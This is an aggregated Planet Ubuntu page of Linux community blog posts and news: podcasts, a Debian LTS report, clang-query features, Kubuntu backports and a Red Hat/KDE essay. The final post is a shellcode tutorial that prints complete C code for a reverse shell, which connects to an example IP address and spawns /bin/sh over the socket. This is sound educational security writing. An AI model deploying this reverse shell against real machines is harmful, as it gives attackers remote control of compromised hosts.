
Planet Ubuntu

Planet Ubuntu - http://planet.ubuntu.com/

Tiago Carrondo: S01E11 – Alta Coltura

Mon, 19/11/2018 - 12:32 AM

This week the wonder trio turned its attention to reading suggestions, technical and otherwise, because life is not just podcasts… News from the SolusOS world, the partnership between Canonical and Samsung and the Linux on Dex project, not forgetting the Festa do Software Livre da Moita 2018, which is just around the corner! You know the drill: listen, subscribe and share!

Sponsorship

This episode was produced and edited by Alexandre Carrapiço (Thunderclaws Studios – sound recording, production, editing, mixing and mastering). Contact: thunderclawstudiosPT–at–gmail.com.

Attribution and licences

The theme music is “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)” by Alpha Hydrae, licensed under the CC0 1.0 Universal License.

This episode is licensed under the Attribution-NonCommercial-NoDerivatives 4.0 International licence (CC BY-NC-ND 4.0), whose full text can be read here. We are open to licensing for other kinds of use; contact us for validation and authorisation.

Full Circle Magazine: Full Circle Weekly News #115

Sun, 18/11/2018 - 6:01 PM

Open Source Software: 20-Plus Years of Innovation
Source: https://www.linuxinsider.com/story/Open-Source-Software-20-Plus-Years-of-Innovation-85646.html

IBM Buys Linux & Open Source Software Distributor Red Hat For $34 Billion
Source: https://fossbytes.com/ibm-buys-red-hat-open-source-linux/

We (may) now know the real reason for that IBM takeover. A distraction for Red Hat to axe KDE
Source: https://www.theregister.co.uk/2018/11/02/rhel_deprecates_kde/

Ubuntu Founder Mark Shuttleworth Has No Plans Of Selling Canonical
Source: https://fossbytes.com/ubuntu-founder-mark-shuttleworth-has-no-plans-of-selling-canonical/

Mark Shuttleworth reveals Ubuntu 18.04 will get a 10-year support lifespan
Source: https://www.zdnet.com/article/mark-shuttleworth-reveals-ubuntu-18-04-will-get-a-10-year-support-lifespan/

Debian GNU/Linux 9.6 “Stretch” Released with Hundreds of Updates
Source: https://news.softpedia.com/news/debian-gnu-linux-9-6-stretch-released-with-hundreds-of-updates-download-now-523739.shtml

Fresh Linux Mint 19.1 Arrives This Christmas
Source: https://www.forbes.com/sites/jasonevangelho/2018/11/01/fresh-linux-mint-19-1-arrives-this-christmas/#6c64618d293d

Linux-friendly company System76 shares more open source Thelio computer details
Source: https://betanews.com/2018/10/26/system76-open-source-thelio-linux/

Linus Torvalds Says Linux 5.0 Comes in 2019, Kicks Off Development of Linux 4.20
Source: https://news.softpedia.com/news/linus-torvalds-is-back-kicks-off-the-development-of-linux-kernel-4-20-523622.shtml

Canonical Adds Spectre V4, SpectreRSB Fixes to New Ubuntu 18.04 LTS Azure Kernel
Source: https://news.softpedia.com/news/canonical-adds-spectre-v4-spectrersb-fixes-to-new-ubuntu-18-04-lts-azure-kernel-523533.shtml

Trivial Bug in X.Org Gives Root Permission on Linux and BSD Systems
Source: https://www.bleepingcomputer.com/news/security/trivial-bug-in-xorg-gives-root-permission-on-linux-and-bsd-systems/

Security Researcher Drops VirtualBox Guest-to-Host Escape Zero-Day on GitHub
Source: https://news.softpedia.com/news/security-researcher-drops-virtualbox-guest-to-host-escape-zero-day-on-github-523660.shtml

Robert Ancell: Counting Code in GNOME Settings

Thu, 15/11/2018 - 9:05 PM
I've been spending a bit of time recently working on GNOME Settings. Part of this has been bringing some of the older panel code up to modern standards, for example by making use of GtkBuilder templates.
I wondered if any of these changes would show in the stats, so I wrote a program to analyse each branch in the git repository and break down the code between C and GtkBuilder. The results were graphed in Google Sheets:
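The post doesn't include the analysis program itself, but the approach it describes can be sketched roughly like this (my own reconstruction, not the author's script; it assumes the working directory is a git checkout and classifies `.c`/`.h` files as C and `.ui` files as GtkBuilder):

```python
#!/usr/bin/env python3
"""Sketch: count C vs GtkBuilder lines for a branch of a git repository."""
import subprocess

def classify(path):
    """Map a file path to a language bucket, or None to skip it."""
    if path.endswith((".c", ".h")):
        return "C"
    if path.endswith(".ui"):
        return "GtkBuilder"
    return None

def count_nonempty(text):
    """Count non-empty lines, so coding-style differences matter less."""
    return sum(1 for line in text.splitlines() if line.strip())

def totals_for_branch(branch):
    """Sum non-empty line counts per language for every file on a branch."""
    files = subprocess.run(
        ["git", "ls-tree", "-r", "--name-only", branch],
        capture_output=True, text=True, check=True).stdout.splitlines()
    totals = {"C": 0, "GtkBuilder": 0}
    for path in files:
        lang = classify(path)
        if lang is None:
            continue
        blob = subprocess.run(
            ["git", "show", f"{branch}:{path}"],
            capture_output=True, text=True, check=True).stdout
        totals[lang] += count_nonempty(blob)
    return totals
```

Running `totals_for_branch` over each branch and pasting the results into a spreadsheet would produce graphs like the ones described below.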



This is just the user accounts panel, which shows some of the reduction in C code and increase in GtkBuilder data:


Here's the breakdown of which panels make up the codebase:



I don't think this draws any major conclusions, but is still interesting to see. Of note:
  • Some of the changes made in 3.28 did reduce the total amount of code! But it was quickly gobbled up by the new Thunderbolt panel.
  • Network and Printers are the dominant panels - look at all that code!
  • I ignored empty lines in the files in case differing coding styles would make some panels look bigger or smaller. It didn't seem to make a significant difference.
  • You can see a reduction in C code looking at individual panels that have been updated, but overall it gets lost in the total amount of code.
I'll have another look in a few cycles when more changes have landed (I'm working on a new sound panel at the moment).

Ubuntu Podcast from the UK LoCo: S11E36 – Thirty-Six Hours

Thu, 15/11/2018 - 4:00 PM

This week we’ve been resizing partitions. We interview Andrew Katz and discuss open source and the law, bring you a command line love and go over all your feedback.

It’s Season 11 Episode 36 of the Ubuntu Podcast! Alan Pope, Mark Johnson and Martin Wimpress are connected and speaking to your brain.

In this week’s show:

snap install hub
hub ci-status
hub issue
hub pr
hub sync
hub pull-request
  • And we go over all your amazing feedback – thanks for sending it – please keep sending it!

  • Image credit: Greyson Joralemon

That’s all for this week! You can listen to the Ubuntu Podcast back catalogue on YouTube. If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

Raphaël Hertzog: Freexian’s report about Debian Long Term Support, October 2018

Thu, 15/11/2018 - 3:36 PM

Like each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In October, about 209 work hours have been dispatched among 13 paid contributors. Their reports are available:

  • Abhijith PA did 1 hour (out of 10 hours allocated + 4 extra hours, thus keeping 13 extra hours for November).
  • Antoine Beaupré did 24 hours (out of 24 hours allocated).
  • Ben Hutchings did 19 hours (out of 15 hours allocated + 4 extra hours).
  • Chris Lamb did 18 hours (out of 18 hours allocated).
  • Emilio Pozuelo Monfort did 12 hours (out of 30 hours allocated + 29.25 extra hours, thus keeping 47.25 extra hours for November).
  • Holger Levsen did 1 hour (out of 8 hours allocated + 19.5 extra hours, but he gave back the remaining hours due to his new role, see below).
  • Hugo Lefeuvre did 10 hours (out of 10 hours allocated).
  • Markus Koschany did 30 hours (out of 30 hours allocated).
  • Mike Gabriel did 4 hours (out of 8 hours allocated, thus keeping 4 extra hours for November).
  • Ola Lundqvist did 4 hours (out of 8 hours allocated + 8 extra hours, but gave back 4 hours, thus keeping 8 extra hours for November).
  • Roberto C. Sanchez did 15.5 hours (out of 18 hours allocated, thus keeping 2.5 extra hours for November).
  • Santiago Ruano Rincón did 10 hours (out of 28 extra hours, thus keeping 18 extra hours for November).
  • Thorsten Alteholz did 30 hours (out of 30 hours allocated).
Evolution of the situation

In November we are welcoming Brian May and Lucas Kanashiro back as contributors after they took some break from this work.

Holger Levsen is stepping down as LTS contributor but is taking over the role of LTS coordinator that was solely under the responsibility of Raphaël Hertzog up to now. Raphaël continues to handle the administrative side, but Holger will coordinate the LTS contributors ensuring that the work is done and that it is well done.

The number of sponsored hours increased to 212 hours per month, as we gained a new sponsor (who shall not be named, since they don’t want to be publicly listed).

The security tracker currently lists 27 packages with a known CVE and the dla-needed.txt file has 27 packages needing an update.

Thanks to our sponsors



Tiago Carrondo: S01E10 – Tendência livre

Wed, 14/11/2018 - 3:02 AM

This time with a guest, Luís Costa, we talked a lot about hardware, open hardware and, as could not be otherwise, about Libretrend's new products, the brand-new Librebox. In a month full of events, the calendar got special attention, with updates on all the announced meetups and events! You know the drill: listen, subscribe and share!

Sponsorship

This episode was produced and edited by Alexandre Carrapiço (Thunderclaws Studios – sound recording, production, editing, mixing and mastering). Contact: thunderclawstudiosPT–at–gmail.com.

Attribution and licences

Cover image: richard ling at Visualhunt, licensed CC BY-NC-ND.

The theme music is “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)” by Alpha Hydrae, licensed under the CC0 1.0 Universal License.

This episode is licensed under the Attribution-NonCommercial-NoDerivatives 4.0 International licence (CC BY-NC-ND 4.0), whose full text can be read here. We are open to licensing for other kinds of use; contact us for validation and authorisation.

Stephen Kelly: Future Developments in clang-query

Sun, 11/11/2018 - 11:46 PM
Getting started – clang-tidy AST Matchers

Over the last few weeks I published some blogs on the Visual C++ blog about Clang AST Matchers. The series can be found here:

I am not aware of any similar series existing which covers creation of clang-tidy checks, and use of clang-query to inspect the Clang AST and assist in the construction of AST Matcher expressions. I hope the series is useful to anyone attempting to write clang-tidy checks. Several people have reported to me that they have previously tried and failed to create clang-tidy extensions, due to various issues, including lack of information tying it all together.

Other issues with clang-tidy include the fact that it relies on the “mental model” a compiler has of C++ source code, which might differ from the “mental model” of regular C++ developers. The compiler needs to have a very exact representation of the code, and needs to have a consistent design for the class hierarchy representing each standard-required feature. This leads to many classes and class hierarchies, and a difficulty in discovering what is relevant to a particular problem to be solved.

I noted several problems in those blog posts, namely:

  • clang-query does not show AST dumps and diagnostics at the same time
  • Code completion does not work with clang-query on Windows
  • AST Matchers which are appropriate to use in contexts are difficult to discover
  • There is no tooling available to assist in discovery of source locations of AST nodes

Last week at code::dive in Wroclaw, I demonstrated tooling solutions to all of these problems. I look forward to video of that talk (and videos from the rest of the conference!) becoming available.

Meanwhile, I’ll publish some blog posts here showing the same new features in clang-query and clang-tidy.

clang-query in Compiler Explorer

Recent work by the Compiler Explorer maintainers adds the possibility to use source code tooling with the website. The compiler explorer contains new entries in a menu to enable a clang-tidy pane.

clang-tidy in Compiler Explorer

I demonstrated using Compiler Explorer to run the clang-query tool at the code::dive conference, building upon the recent work by the Compiler Explorer developers. This feature will get upstreamed in time, but can be used with my own AWS instance for now. This is suitable for exploring the effect that changing source code has on match results and, orthogonally, the effect that changing the AST Matcher has on the match results. It is also accessible via cqe.steveire.com.

It is important to remember that Compiler Explorer is running clang-query in script mode, so it can process multiple let and match calls for example. The new command set print-matcher true helps distinguish the output from the matcher which causes the output. The help command is also available with listing of the new features.
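A short script-mode session might look like the following (the commands are those described above; the particular matcher and the "f" binding are illustrative, not taken from the post):

```
set print-matcher true
let fn functionDecl(hasName("main"))
match fn.bind("f")
```

With print-matcher enabled, each match result is prefixed by the matcher expression that produced it, which is essential when a script contains several match calls.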

The issue of clang-query not printing both diagnostic information and AST information at the same time means that users of the tool need to alternate between writing

set output diag

and

set output dump

to access the different content. Recently, I committed a change to make it possible to enable both dump and diag output from clang-query at the same time. New commands follow the same structure as the set output command:

enable output dump
disable output dump

The set output <feature> command remains as an “exclusive” setting to enable only one output feature and disable all others.

Dumping possible AST Matchers

This command design also enables the possibility of extending the features which clang-query can output. Up to now, developers of clang-tidy extensions had to inspect the AST corresponding to their source code using clang-query and then use that understanding of the AST to create an AST Matcher expression.

That mapping to and from the AST “mental model” is not necessary. New features I am in the process of upstreaming to clang-query enable the output of AST Matchers which may be used with existing bound AST nodes. The command

enable output matcher

causes clang-query to print out all matcher expressions which can be combined with the bound node. This cuts out the requirement to dump the AST in such cases.

Inspecting the AST is still useful as a technique to discover possible AST Matchers and how they correspond to source code. For example if the functionDecl() matcher is already known and understood, it can be dumped to see that function calls are represented by the CallExpr in the Clang AST. Using the callExpr() AST Matcher and dumping possible matchers to use with it leads to the discovery that callee(functionDecl()) can be used to determine particulars of the function being called. Such discoveries are not possible by only reading AST output of clang-query.
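Put together, a discovery session along those lines might look like this (the exact matcher expression is my illustration of the workflow, not output from the tool):

```
enable output matcher
match callExpr(callee(functionDecl())).bind("call")
```

For each node bound as "call", clang-query then prints matcher expressions, such as callee(), which can be combined with it.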

Dumping possible Source Locations

The other important discovery space in creation of clang-tidy extensions is that of Source Locations and Source Ranges. Developers creating extensions must currently rely on the documentation of the Clang AST to discover available source locations which might be relevant. Usually though, developers have the opposite problem. They have source code, and they want to know how to access a source location from the AST node which corresponds semantically to that line and column in the source.

It is important to make use of a semantically relevant source location in order to make reliable tools which refactor at scale and without human intervention. For example, a cursory inspection of the locations available from a FunctionDecl AST node might lead to the belief that the return type is available at the getBeginLoc() of the node.

However, this is immediately challenged by the C++11 trailing return type feature, where the actual return type is located at the end. For a semantically correct location, you must currently use

getTypeSourceInfo()->getTypeLoc().getAs<FunctionTypeLoc>().getReturnLoc().getBeginLoc()

It should be possible to use getReturnTypeSourceRange(), but a bug in clang prevents that as it does not appreciate the trailing return types feature.

Once again, my new output feature of clang-query presents a solution to this discovery problem. The command

enable output srcloc

causes clang-query to output the source locations by accessor and caret corresponding to the source code for each of the bound nodes. By inspecting that output, developers of clang-tidy extensions can discover the correct expression (usually via the clang::TypeLoc hierarchy) corresponding to the source code location they are interested in refactoring.

Next Steps

I have made many more modifications to clang-query which I am in the process of upstreaming. My Compiler Explorer instance is listed as the ‘clang-query-future’ tool, while the clang-query-trunk tool runs the current trunk version of clang-query. Both can be enabled for side-by-side comparison of the future clang-query with the existing one.

Kubuntu General News: Plasma 5.14.3 update for Cosmic backports PPA

Wed, 07/11/2018 - 1:44 PM

We are pleased to announce that the 3rd bugfix release of Plasma 5.14, 5.14.3, is now available in our backports PPA for Cosmic 18.10.

The full changelog for 5.14.3 can be found here.

Already released in the PPA is an update to KDE Frameworks 5.51.

To upgrade:

Add the following repository to your software sources list:

ppa:kubuntu-ppa/backports

or if it is already added, the updates should become available via your preferred update method.

The PPA can be added manually in the Konsole terminal with the command:

sudo add-apt-repository ppa:kubuntu-ppa/backports

and packages then updated with

sudo apt update
sudo apt full-upgrade

 

IMPORTANT

Please note that more bugfix releases are scheduled by KDE for Plasma 5.14, so while we feel these backports will be beneficial to enthusiastic adopters, users wanting to use a Plasma release with more stabilisation/bugfixes ‘baked in’ may find it advisable to stay with Plasma 5.13.5 as included in the original 18.10 Cosmic release.

Should any issues occur, please provide feedback on our mailing list [1], IRC [2], and/or file a bug against our PPA packages [3].

1. Kubuntu-devel mailing list: https://lists.ubuntu.com/mailman/listinfo/kubuntu-devel
2. Kubuntu IRC channels: #kubuntu & #kubuntu-devel on irc.freenode.net
3. Kubuntu ppa bugs: https://bugs.launchpad.net/kubuntu-ppa

Diego Turcios: Access to AWS Postgres instance in private subnet

Wed, 07/11/2018 - 3:54 AM
I have been working with AWS in the last few days and encountered some issues when using RDS. Generally, when you're working in a development environment you set up your database as publicly accessible, and this isn't an issue. But it is when you're working in production, so we place the Amazon RDS database into a private subnet. What do we need to do to connect to the database using PgAdmin or another tool?

We're going to use one of the most common methods for doing this. You will need to launch an Amazon EC2 instance in the public subnet and then use it as a jump box.

So after you have your EC2 instance, you will need to run the following command.
See the explanation below.
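The original post relied on an embedded image for the command; what follows is a sketch of the usual SSH local port forward through the jump box (the key path, hostnames and local port 5433 are placeholder values, not real ones):

```
# Forward local port 5433 to the RDS endpoint, via the EC2 jump box.
# -N: no remote command, just keep the tunnel open.
ssh -i ~/.ssh/my-key.pem \
    -N -L 5433:mydb-instance.abc123.us-east-1.rds.amazonaws.com:5432 \
    ec2-user@ec2-x-x-x-x.compute-1.amazonaws.com
```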

After this, you will need to configure your PgAdmin.
The host name will be localhost, and the port is the same one you defined in the command above.
The maintenance database will be your DB name, together with the username you use for connecting.

Hope this helps you connect to your databases.

Jono Bacon: Video: 10 Avoidable Career Mistakes (and How to Conquer Them)

Tue, 06/11/2018 - 5:30 PM

I don’t claim to be a career expert, but I have noticed some important career mistakes many people make (some I’ve made myself!). These mistakes span how we approach our career growth, how we balance our careers with the rest of our lives, and the choices we make on a day-to-day basis.

In the latest episode of my Open Organization video series, I delve into 10 of the most important career mistakes people tend to make. Check it out below:

So, now let me turn it to you. What are other career mistakes that are avoidable? What have you learned in your career? Share them in the comments below!

The post Video: 10 Avoidable Career Mistakes (and How to Conquer Them) appeared first on Jono Bacon.

Jono Bacon: My Clients Are Hiring Community Roles: Corelight, Scality, and Solace

Mon, 05/11/2018 - 7:29 AM

One of the things I love about working with such a diverse range of clients is helping them to shape, source, and mentor high-quality staff to build and grow their communities.

Well, three of my clients – Corelight, Scality, and Solace – are all hiring community staff for their teams. I know many of you work in community management, so I always want to share new positions here in case you want to apply. If these look interesting, you should apply via the role description – don’t send me your resume. If we know each other (as in, we are friends/associates), feel free to reach out to me if you have questions.

(These are listed alphabetically based on the company name)

Corelight Director of Community

See the role here

Corelight are doing some really interesting work. They provide security solutions based around the Bro security monitor, and they invest heavily in that community (hiring staff, sponsoring events, producing code and more). Corelight are very focused on open source and being good participants in the Bro community. This role will not just serve Corelight but also support and grow the Bro community.

Scality Technical Community Manager

See the role here

I started working with Scality a while back with the focus of growing their open source Zenko community. As I started shaping the community strategy with them, we hired for the Director Of Community role there, and my friend Stefano Maffulli, who had done great work at Dreamhost and OpenStack, got it.

Well, Stef needs to hire someone for his team, and this is a role with a huge amount of potential. It will be focused on building, fostering, and growing the Zenko community, producing technical materials, working with developers, speaking, and more. Stef is a great guy and will be a great manager to work for.

Solace Director Of Community and Developer Community Evangelist

Solace have built a lightning-fast infrastructure messaging platform and they are building a community focused on supporting developers who use their platform. They are a great team, and are really passionate about not just building a community, but doing it the right way.

They are hiring for two roles. One will be leading the overall community strategy and delivery and the other will be an evangelist role focused on building awareness and developer engagement.

All three of these companies are doing great work, and really focused on building community the right way. Check out the roles and best of luck!

The post My Clients Are Hiring Community Roles: Corelight, Scality, and Solace appeared first on Jono Bacon.

Stephen Michael Kellat: Writing Up Plan B

Mon, 05/11/2018 - 12:21 AM

With the prominence of things like Liberapay and Patreon as well as Snowdrift.coop, I have had to look at the tax implications of them all.  There is no single tax regime on this planet.  Developers and other freelancers who might make use of one of these services within the F/LOSS frame of reference are frequently not within the USA frame of reference.  That makes a difference.

 

I also have to state at the outset that this does not constitute legal advice.  I am not a lawyer.  I am most certainly not your lawyer.  If anything these recitals are my setting out my review of all this as being “Plan B” due to continuing high tensions surrounding being a federal civil servant in the United States.  With an election coming up Tuesday where one side treats it as a normal routine event while the other is regarding it as Ragnarok and is acting like humanity is about to face an imminent extinction event, changing things up in life may be worthwhile.

 

An instructive item to consider is Internal Revenue Service Publication 334 Tax Guide for Small Business (For Individuals Who Use Schedule C or C-EZ).  The current version can be found online at https://www.irs.gov/forms-pubs/about-publication-334.  Just because you receive money from people over the Internet does not necessarily mean it is free from taxation.  Generally the income a developer, freelance documentation writer, or a freelancer in general might receive from a Liberapay or Snowdrift.coop appears to fall under “gross receipts”.  

 

A recent opinion of the United States Tax Court (Felton v. Commissioner, T.C. Memo 2018-168) discusses the issue of “gift” for tax purposes rather nicely in comparison to what Liberapay mentions in its FAQ.  You can find the FAQ at https://liberapay.com/about/faq.  The opinion can be found at https://www.ustaxcourt.gov/ustcinop/OpinionViewer.aspx?ID=11789.  After reading the discussion in Felton, I remain assured that in the United States context anything received via Liberapay would have to be treated as gross receipts in the United States.  The rules are different in the European Union where Liberapay is based and that’s perfectly fine.  In the end I have to answer to the tax authorities in the United States.

 

The good part about reporting matters on Schedule C is that it preserves participation in Social Security and allows a variety of business expenses and deductions to be taken.  Regular wage-based employees pay into Social Security via the FICA tax.  Self-employed persons pay into Social Security via SECA tax.

 

Now, there are various works I would definitely ask for support if I left government.  Such includes:

 

  • Freelance documentation writing

  • Emergency Management/Homeland Security work under the aegis of my church

  • Podcast production

  • Printing & Publishing

 

For podcast production, general news reviews would be possible.  Going into actual entertainment programming would be nice.  There are ideas I’m still working out.

 

Printing & Publishing would involve getting small works into print on a more rapid cycle in light of an increasingly censored Internet.  As the case of Gab.ai shows, one of your users can do something horrible that the site itself had no part in, and yet all of your hosting partners may withdraw service so as to knock you offline.  Outside the context of the USA, total shutdowns of access to the Internet still occur from time to time in other countries.

 

Emergency Management comes under the helping works of the church.

 

As to documentation writing, I used to write documentation for Xubuntu.  I want to do that again.

 

As to the proliferation of codes of conduct that are appearing everywhere, I can only offer the following statement:

 

“I am generally required to obey the United States Constitution and laws of the United States of America, the Constitution of the State of Ohio and Ohio’s laws, and the orders of any commanding officers appointed to me as a member of the unorganized militia (Ohio Revised Code 5923.01(D), Title 10 United States Code Section 246(b)(2)).  Codes of Conduct adopted by projects and organizations that conflict with those legal responsibilities must either be disregarded or accommodations must otherwise be sought.”

 

So, that’s “Plan B”.  The dollar amounts remain flexible at the moment as I’m still waiting for matters to pan out at work.  If things turn sour at my job, I at least have plans to hit the ground running seeking contracts and otherwise staying afloat.

 

 

Santiago Zarate: gentoo eix-update failure

Sun, 04/11/2018 - 1:00 AM
Summary

If you are having the following error on your Gentoo system:

Can't open the database file '/var/cache/eix/portage.eix' for writing (mode = 'wb')

Don’t waste your time: the /var/cache/eix directory is simply not present and/or not writable by the eix/portage user:

mkdir -p /var/cache/eix
chmod +w /var/cache/eix

The basic story is that eix will drop privileges to the portage user when run as root.

Jonathan Riddell: Red Hat and KDE

Fri, 02/11/2018 - 5:36 PM

By a strange coincidence the news broke this morning that RHEL is deprecating KDE. The real surprise here is that RHEL supported KDE at all.  Back in the 90s they were entirely against KDE and put lots of effort into our friendly rivals Gnome.  It made some sense, since at the time Qt was under a not-quite-free licence and there’s no reason why a company would want to support another company’s lock-in as well as shipping incompatible licences.  By the time Qt became fully free they were firmly behind Gnome.  Meanwhile Rex and a team of hard-working volunteers packaged it anyway and gained many users.  When Red Hat was turned into the all-open Fedora and the closed RHEL, Fedora was able to embrace KDE as it should, but at some point the Fedora Next initiative again put KDE software in second place. Meanwhile RHEL did use Plasma 4 and hired a number of developers to help us in our time of need, which was fabulous, but all except one left some time ago and nobody expected it to continue for long.

So the deprecation is not really new or news, and being picked up by the news is poor timing for Red Hat; it’s unclear if they want some distraction from the IBM news or it's just The Register playing around.  The community has always been much better at supporting our software for their users; maybe now the community-run EPEL archive can include modern Plasma 5 instead of being stuck on the much poorer previous release.

Plasma 5 is now lightweight and feature full.  We get new users and people rediscovering us every day who report it as the most usable and pleasant way to run their day.  From my recent trip in Barcelona I can see how a range of different users from university to schools to government consider Plasma 5 the best way to support a large user base.  We now ship on high end devices such as the KDE Slimbook down to the low spec value device of Pinebook.  Our software leads the field in many areas such as video editor Kdenlive, or painting app Krita or educational suite GCompris.  Our range of projects is wider than ever before with textbook project WikiToLearn allowing new ways to learn and we ship our own software through KDE Windows, Flatpak builds and KDE neon with Debs, Snaps and Docker images.

It is a pity that RHEL users won’t be there to enjoy it by default. But, then again, they never really were. KDE is collaborative, open, privacy aware and with a vast scope of interesting projects after 22 years we continue to push the boundaries of what is possible and fun.


Diego Turcios: Getting Docker Syntax In Gedit

Fri, 02/11/2018 - 5:18 PM
I have been working with Docker in the last few days and encountered the syntax issue with gedit: just pure plain text. So I made a quick search and found an easy way to fix this. I found Jasper J.F. van den Bosch's repository on GitHub, which has the solution to this simple problem.
We need to download the docker.lang file, available here: https://github.com/ilogue/docker.lang/blob/master/docker.lang

After that, go to the folder where you saved the file and run the following command.

sudo mv docker.lang /usr/share/gtksourceview-3.0/language-specs/

If this doesn't work you can try the following:

sudo mv docker.lang ~/.local/share/gtksourceview-3.0/language-specs/

And that's all!

Screenshot of gedit with no docker lang


Screenshot of gedit with docker lang

Sean Davis: Xubuntu Development Update November 2018

Thu, 01/11/2018 - 4:28 AM

Aaaaaaaaaaaand, we’re back! After skipping last month’s development update, there are a lot of new developments to unpack from the previous 2 months. Let’s get right to it.

Xubuntu 18.10 “Cosmic Cuttlefish”

We wrapped up development on Xubuntu 18.10 throughout September and October, landing the following changes in the last month and a half of work.

This release includes 6 new GTK+ 3 Xfce components, giving users a snapshot of the Xfce 4.14 development. More information about the release can be found in the release notes.

Upcoming Fixes

Since the 18.10 release, we’ve identified fixes for two of our documented bugs. We’ll be pushing these fixes to our users via the stable release updates.

  • Panel: Window buttons are not clickable at the top pixel of the screen (LP: #1795135)
    • Resolution: Export GDK_CORE_DEVICE_EVENTS = 1 (Xfce Git)
  • Settings Manager: Mouse fails to scroll embedded panels (LP: #1653448)
    • Resolution: Export GDK_CORE_DEVICE_EVENTS = 1 (Xfce Git)
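Until those stable release updates land, affected users can apply the documented resolution manually; a sketch (exporting the variable in ~/.xprofile is a common approach, not an official Xubuntu instruction):

```shell
# Make GDK fall back to core X11 events, which addresses both
# issues above (panel top-pixel clicks and embedded-panel scrolling).
export GDK_CORE_DEVICE_EVENTS=1
# To make it persistent for your session, add the same line to ~/.xprofile.
```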
Xfce

September New Releases

October New Releases

4.14 Roadmap Updates

The Xfce development team has worked on tidying up the Xfce 4.14 roadmap over the last few days. Statuses have been updated, pending work has been moved to the top of each section, and completion percents have been adjusted to better reflect each project’s progress. With these updates, we can now see that…

Xfce 4.14 is now approximately 83% complete.

Of course, we need all the help we can get to get this milestone out the door. Check out the Xfce Contribute page to find out how you can help.

What’s Next?

With the 18.10 release now behind us, and the 19.04 cycle starting today, it’s time to get back to work! No release goals have been determined yet, so stay tuned to the Xubuntu Development mailing list for updates about Xubuntu 19.04 “Disco Dingo” development.

Daniel Pocock: RHL'19 St-Cergue, Switzerland, 25-27 January 2019

Wed, 31/10/2018 - 10:06pm

(translated from original French version)

The Rencontres Hivernales du Libre (RHL) (Winter Meeting of Freedom) takes place 25-27 January 2019 at St-Cergue.

Swisslinux.org invites the free software community to come and share workshops, great meals and good times.

This year, we celebrate the 5th edition with the theme «Exploit».

Please think creatively and submit proposals exploring this theme: lectures, workshops, performances and other activities are all welcome.

RHL'19 is situated directly at the base of some family-friendly ski pistes suitable for beginners and more adventurous skiers. It is also a great location for alpine walking trails.

Why, who?

RHL'19 brings together the forces of freedom in the Leman basin, Romandy, neighbouring France and further afield (there is an excellent train connection from Geneva airport). Hackers and activists come together to share a relaxing weekend and discover new things with free technology and software.

If you have a project to present (in 5 minutes, an hour or another format) or activities to share with other geeks, please send an email to rhl-team@lists.swisslinux.org or submit it through the form.

If you have any specific venue requirements please contact the team.

You can find detailed information on the event web site.

Please ask if you need help finding accommodation or any other advice planning your trip to the region.

Lubuntu Blog: Disco Dingo: The development cycle has started!

Wed, 31/10/2018 - 4:16pm
The development cycle for the Disco Dingo (which will be the codename for the 19.04 release) has started for the Lubuntu team! (Translated into: español)

UPDATE: Daily images are now up, and are available on our downloads page, for the adventurous. Also, an update to Perl 5.28 is being done prior to opening as well. […]

David Tomaschik: Understanding Shellcode: The Reverse Shell

Tue, 30/10/2018 - 8:00am

A recent conversation with a coworker inspired me to start putting together a series of blog posts to examine what it is that shellcode does. In the first installment, I’ll dissect the basic reverse shell.

First, a couple of reminders: shellcode is the machine code that is injected into the flow of a program as the result of an exploit. It generally must be position independent as you can’t usually control where it will be loaded in memory. A reverse shell initiates a TCP connection from the compromised host back to a host under the control of the attacker. It then launches a shell with which the attacker can interact.

Reverse Shell in C

Let’s examine a basic reverse shell in C. Error handling is elided, both to save space in this post and because most shellcode is not going to have error handling.

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>

void reverse_shell() {
    /* Allocate a socket for IPv4/TCP (1) */
    int sock = socket(AF_INET, SOCK_STREAM, 0);

    /* Setup the connection structure. (2) */
    struct sockaddr_in sin;
    sin.sin_family = AF_INET;
    sin.sin_port = htons(4444);

    /* Parse the IP address (3) */
    inet_pton(AF_INET, "192.168.22.33", &sin.sin_addr.s_addr);

    /* Connect to the remote host (4) */
    connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr_in));

    /* Duplicate the socket to STDIO (5) */
    dup2(sock, STDIN_FILENO);
    dup2(sock, STDOUT_FILENO);
    dup2(sock, STDERR_FILENO);

    /* Setup and execute a shell. (6) */
    char *argv[] = {"/bin/sh", NULL};
    execve("/bin/sh", argv, NULL);
}

Reverse Shell Steps

As can be seen, there are approximately 6 steps in setting up a reverse shell. Once they are understood, this can be converted to proper shellcode.

  1. First we need to allocate a socket structure in the kernel with a call to socket. This is a wrapper for a system call (since it has effects in kernel space). On x86, this wraps a system call called socketcall, which is a single entry point for dispatching all socket-related system calls. On x86-64, the different socket system calls are actually distinct system calls, so this will call the socket system call. It needs to know the address family (AF_INET for IPv4) and the socket type (SOCK_STREAM for TCP, it would be SOCK_DGRAM for UDP). This returns an integer that is a file descriptor for the socket.
  2. Next, we need to setup a struct sockaddr_in, which includes the family (AF_INET again), and the port number in network byte order (big-endian).
  3. We also need to put the IP address into the structure. inet_pton can parse a string form into the struct. In a struct sockaddr_in, this is a 4 byte value, again in network byte order.
  4. We now have the full structure setup, so we can initiate a connection to the remote host using the already-created socket. This is done with a call to connect. Like socket, this is a wrapper for the socketcall system call on x86, and for a connect system call on x86-64.
  5. We want the shell to use our socket when it is handling standard input/output (stdio) functions. To do this, we duplicate the file descriptor from the socket to each of STDIN, STDOUT, STDERR. Like so many others, dup2() is a thin wrapper around a system call.
  6. Finally, we setup the arguments for our shell, and launch it with execve, yet another system call. This one will replace the current binary image with the targeted binary (/bin/sh) and then execute it from the entry point. It will execute with its standard input, output, and error connected to the network socket.
Why not shellcode in C?

So, if we have a working function, why can’t we just use that as shellcode? Well, even if we compile position independent code (-pie -fPIE in gcc), this code will still have many library calls in it. In a normal program, this is no problem, as it will be linked with the C library and run fine. However, this relies on the loader doing the right thing, including the placement of the PLT and GOT. When we inject shellcode, we only inject the machine code, and don’t include any data areas necessary for the location of the GOT.

What about statically linking the C library to avoid all these problems? While that has the potential to work, any constants (like the strings for the IP address and the shell path) will be located in a different section of the binary, and so the code will be unable to reference those. (Unless we inject that section as well and fixup the relative addresses, but in that case, the complexity of our loader approaches the complexity of our entire shellcode.)
